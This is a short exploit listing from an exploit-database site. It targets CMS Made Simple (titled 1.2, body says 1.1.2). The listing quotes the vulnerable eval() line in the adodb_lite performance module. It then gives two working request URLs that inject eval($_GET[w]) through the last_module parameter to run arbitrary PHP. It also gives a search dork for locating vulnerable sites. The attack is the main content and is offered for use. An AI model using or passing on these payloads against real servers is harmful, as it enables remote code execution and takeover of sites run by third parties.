[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMS Made Simple 1.2 Remote Code Execution Vulnerability

Author
irk4z
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2160
Category
web applications
Date add
20-09-2007
Platform
unsorted
=======================================================
CMS Made Simple 1.2 Remote Code Execution Vulnerability
=======================================================



#                                      o      [bug]     /"*._         _        #
#                 .                     .    .      .-*'`    `*-.._.-'/        #
#                                   o       o     < * ))     ,       (         #
#                            .           o          `*-._`._(__.--*"`.\        #
#                                                                              #
# vuln.: CMS Made Simple 1.1.2 Remote Code Execution Vulnerability             #
# download:                                                                    #
#  http://dev.cmsmadesimple.org/frs/download.php/1424/cmsmadesimple-1.1.2.zip  #
# dork: "powered by CMS Made Simple version 1.1.2"                             #
# greetz: cOndemned, kacper                                                    #

# code:

/lib/adodb_lite/adodb-perf-module.inc.php:
...
 eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
...

# exploit:

 http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=phpinfo();
 http://[site]/[path]/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection{}eval($_GET[w]);class%20zZz_ADOConnection{}//&w=[ PHPCODE ]




#  0day.today [2024-12-24]  #